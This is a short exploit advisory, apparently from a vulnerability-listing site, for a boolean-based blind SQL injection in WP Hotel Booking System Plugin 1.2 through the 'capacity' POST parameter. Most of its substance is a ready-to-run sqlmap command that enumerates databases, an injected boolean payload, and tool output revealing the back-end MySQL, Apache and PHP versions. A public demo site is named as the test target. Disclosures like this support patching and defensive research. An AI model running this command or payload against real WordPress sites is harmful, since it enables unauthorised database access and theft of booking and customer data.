WP Hotel Booking System Plugin 1.2 - Boolean-Based Blind SQL İnjection

2017.05.06

Siber Güvenlik Akademisi (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

<------------------ header data start ------------------- >
#############################################################
# Application Name : WP Hotel Booking System Plugin 1.2 
# Vulnerable Type : Boolean-Based Blind SQL İnjection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site:
http://envato.bestsoftinc.net/wp-hotel/
# Author: Siber Güvenlik Akademisi - Pentester
# Date: 05.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'capacity' (POST)
# SQLİ: Http://localhost/wphotel/
# Proof of concept:
sqlmap -u "http://localhost/wphotel/" --data="check_in=05%2F05%2F2017&check_out=05%2F20%2F2017&capacity=1&child_per_room=1" -p "capacity" --random-agent --threads=5 --dbs

Parameter: capacity (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: check_in=05/10/2017&check_out=06/26/2017&capacity=1 AND 6953=6953&c
hild_per_room=1
---
[20:44:25] [INFO] testing MySQL
[20:44:28] [INFO] confirming MySQL
[20:44:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16

< ------------------- header data end of ------------------- >

References:

https://www.youtube.com/channel/UCjZcTUoYCR5nLj8G1riUvLw

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WP Hotel Booking System Plugin 1.2 - Boolean-Based Blind SQL İnjection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.